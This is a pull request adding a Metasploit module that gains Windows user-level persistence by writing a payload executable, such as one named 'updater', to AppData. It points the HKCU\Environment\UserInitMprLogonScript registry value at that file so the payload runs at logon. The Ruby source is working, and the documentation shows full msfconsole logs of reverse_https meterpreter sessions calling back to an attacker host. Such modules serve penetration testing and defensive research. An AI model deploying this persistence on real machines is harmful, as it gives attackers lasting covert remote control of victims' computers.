### PR TITLE
windows persistence userinit_mpr_logon

### DIFF
--- a/documentation/modules/exploit/windows/persistence/userinit_mpr_logon_script.md
+++ b/documentation/modules/exploit/windows/persistence/userinit_mpr_logon_script.md
@@ -1,0 +1,237 @@
+## Vulnerable Application
+### Windows Persistence via HKCU UserInitMprLogonScript
+
+This module establishes persistence by leveraging the per-user registry value:
+
+HKCU\Environment\UserInitMprLogonScript
+
+The module writes a payload executable to disk and sets the
+`UserInitMprLogonScript` value so that the payload executes when the user
+logs in.
+
+Unlike the traditional `Winlogon\Userinit` (HKLM) technique, this method:
+
+* Does not require administrative privileges
+* Does not modify system-wide registry keys
+* Only affects the current user
+* Executes during interactive user logon
+
+The payload will execute when the user signs out and logs back in.
+
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Obtain a meterpreter session on a Windows target (user-level is sufficient)
+3. `use exploit/windows/persistence/userinit_mpr_logon_script`
+4. `set SESSION <id>`
+5. `set LHOST <attacker_ip>`
+6. `set LPORT <attacker_port>`
+7. `run`
+8. Sign out from the Windows session
+9. Log back in
+10. A new meterpreter session should be created
+
+
+
+## Options
+
+### SESSION (Required)
+
+The session to run this module on.
+
+### LHOST (Required)
+
+The local host to receive the reverse connection.
+
+### LPORT (Required)
+
+The local port to receive the reverse connection.
+
+### PAYLOAD_NAME
+
+The filename to use when writing the payload to disk.
+
+If not specified, a random filename will be generated.
+
+
+
+## Scenarios
+
+### Initial Session
+```
+msf > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
+msf exploit(multi/handler) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf exploit(multi/handler) >  run
+[*] Started HTTPS reverse handler on https://172.21.176.212:4444
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
+[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ...
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+Id  Name  Type                 Information       Connection
+  --  ----  ----                 -----------       ----------
+1         meterpreter x64/win  NERO\DELL @ NERO  172.21.176.212:4444 ->
+dows                                   172.21.176.1:62359 (172
+.21.176.1)
+```
+### Install Persistence
+```
+msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1
+SESSION => 1
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444
+LPORT => 4444
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater
+PAYLOAD_NAME => updater
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming
+WRITABLEDIR => C:\Users\DELL\AppData\Roaming
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true
+CleanUpRc => true
+msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true
+VERBOSE => true
+msf exploit(windows/persistence/userinit_mpr_logon_script) > check
+[+] The target is vulnerable. Registry path is writable
+msf exploit(windows/persistence/userinit_mpr_logon_script) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/userinit_mpr_logon_script) >
+[-] Handler failed to bind to 172.21.176.212:4444:-  -
+[-] Handler failed to bind to 0.0.0.0:4444:-  -
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Registry path is writable
+[+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe
+[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe
+[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc
+jobs
+
+Jobs
+====
+
+  Id  Name                   Payload                Payload opts
+  --  ----                   -------                ------------
+  0   Exploit: windows/pers  windows/meterpreter/r  tcp://172.21.176.212:4
+      istence/userinit_mpr_  everse_tcp             444 (setting up)
+      logon_script
+
+msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
+
+Jobs
+====
+
+  Id  Name                   Payload                Payload opts
+  --  ----                   -------                ------------
+  0   Exploit: windows/pers  windows/meterpreter/r  tcp://172.21.176.212:4
+      istence/userinit_mpr_  everse_tcp             444 (setting up)
+      logon_script
+
+msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K
+Stopping all jobs...
+msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
+
+Jobs
+====
+
+No active jobs.
+
+msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler
+[*] Using configured payload windows/x64/meterpreter/reverse_https
+msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
+msf exploit(multi/handler) > set LHOST 172.21.176.212
+LHOST => 172.21.176.212
+msf exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf exploit(multi/handler) > run -j
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(multi/handler) >
+[*] Started HTTPS reverse handler on https://172.21.176.212:4444
+
+msf exploit(multi/handler) > jobs
+
+Jobs
+====
+
+  Id  Name                   Payload                Payload opts
+  --  ----                   -------                ------------
+  1   Exploit: multi/handle  windows/x64/meterpret  https://172.21.176.212
+      r                      er/reverse_https       :4444
+
+msf exploit(multi/handler) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: NERO\DELL
+meterpreter > sysinfo
+Computer        : NERO
+OS              : Windows 11 24H2+ (10.0 Build 26200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript
+Key: HKCU\Environment
+Name: UserInitMprLogonScript
+Type: REG_SZ
+Data: C:\Users\DELL\AppData\Roaming\updater.exe
+meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test
+Successfully set testvalue of REG_SZ.
+meterpreter > reg deleteval -k HKCU\\Environment -v testvalue
+Successfully deleted testvalue.
+meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe
+100777/rwxrwxrwx  7168  fil  2026-03-01 05:47:24 +0200  C:\Users\DELL\AppData\Roaming\updater.exe
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                 Information       Connection
+  --  ----  ----                 -----------       ----------
+  1         meterpreter x64/win  NERO\DELL @ NERO  172.21.176.212:4444 ->
+            dows                                   172.21.176.1:62359 (172
+                                                   .21.176.1)
+
+msf exploit(multi/handler) > sessions -K
+[*] Killing all sessions...
+[*] 172.21.176.1 - Meterpreter session 1 closed.
+msf exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+No active sessions.
+
+msf exploit(multi/handler) >
+```
+
+### Logout, and log back in
+
+```
+msf exploit(multi/handler) > 
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
+[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session...
+[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
+[*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200
+```

--- a/modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
+++ b/modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Persistence via UserInitMprLogonScript',
+        'Description' => %q{
+          This module establishes persistence by setting the UserInitMprLogonScript
+          value in HKCU\Environment. During user logon, userinit.exe checks this value
+          and executes the specified command or binary.
+
+          The module writes a payload executable to disk and points
+          UserInitMprLogonScript to that payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Nayera'],
+        'Platform' => [ 'win' ],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
+          ['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
+          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2015-07-01',
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+                       OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
+                     ])
+  end
+
+  def regkey
+    'HKCU\\Environment'
+  end
+
+  def writable_dir
+    d = super
+    return session.sys.config.getenv(d) if d.start_with?('%')
+
+    d
+  end
+
+  def check
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%')
+
+    return CheckCode::Safe("#{writable_dir} does not exist") unless exists?(writable_dir)
+
+    test_name = Rex::Text.rand_text_alpha(8)
+    test_value = Rex::Text.rand_text_alpha(8)
+    return CheckCode::Safe("Unable to write to registry path #{regkey}") unless registry_setvaldata(regkey, test_name, test_value, 'REG_SZ')
+
+    registry_deleteval(regkey, test_name)
+
+    CheckCode::Vulnerable('Registry path is writable')
+  end
+
+  def install_persistence
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(rand(6..13))
+    payload_exe = generate_payload_exe
+    payload_pathname = "#{writable_dir}\\#{payload_name}.exe"
+
+    vprint_good("Writing payload to #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
+
+    old_value = registry_getvaldata(regkey, 'UserInitMprLogonScript')
+    registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ')
+    print_good("Configured #{regkey}\\UserInitMprLogonScript to execute #{payload_pathname}")
+
+    if old_value.nil?
+      @clean_up_rc = "reg deleteval -k '#{regkey}' -v 'UserInitMprLogonScript'\n"
+    else
+      escaped_old_value = old_value.gsub('\\', '\\\\')
+      @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v UserInitMprLogonScript /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
+    end
+    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
+  end
+end

--- a/modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
+++ b/modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
@@ -57,12 +57,6 @@ class MetasploitModule < Msf::Exploit::Local
     'HKCU\\Environment'
   end
 
-  def writable_dir
-    d = super
-    return session.sys.config.getenv(d) if d.start_with?('%')
-
-    d
-  end
 
   def check
     print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%')

--- a/modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
+++ b/modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
@@ -49,14 +49,13 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     register_options([
-                       OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
-                     ])
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.'])
+    ])
   end
 
   def regkey
     'HKCU\\Environment'
   end
-
 
   def check
     print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%')


### PR DESCRIPTION
This PR fixes [#20821](https://github.com/rapid7/metasploit-framework/issues/20821) by implementing a new Windows persistence module that abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.


## Verification
- [ ] Start `msfconsole`
- [ ] Obtain a meterpreter session on a Windows target (user-level )
- [ ] `use exploit/windows/persistence/userinit_mpr_logon_script`
- [ ] `set SESSION <id>`
- [ ] `set LHOST <attacker_ip>`
- [ ] `set LPORT <attacker_port>`
- [ ] `set PAYLOAD_NAME updater`
- [ ] `set WRITABLEDIR C:\\Users\\<user_name>\\AppData\\Roaming`
- [ ] `set CleanUpRc true`
- [ ] `set VERBOSE true`
- [ ] `check`
- [ ] `run`
- [ ] Sign out then Log back in
- [ ] A new meterpreter session is created

### A scenario example in the documentation 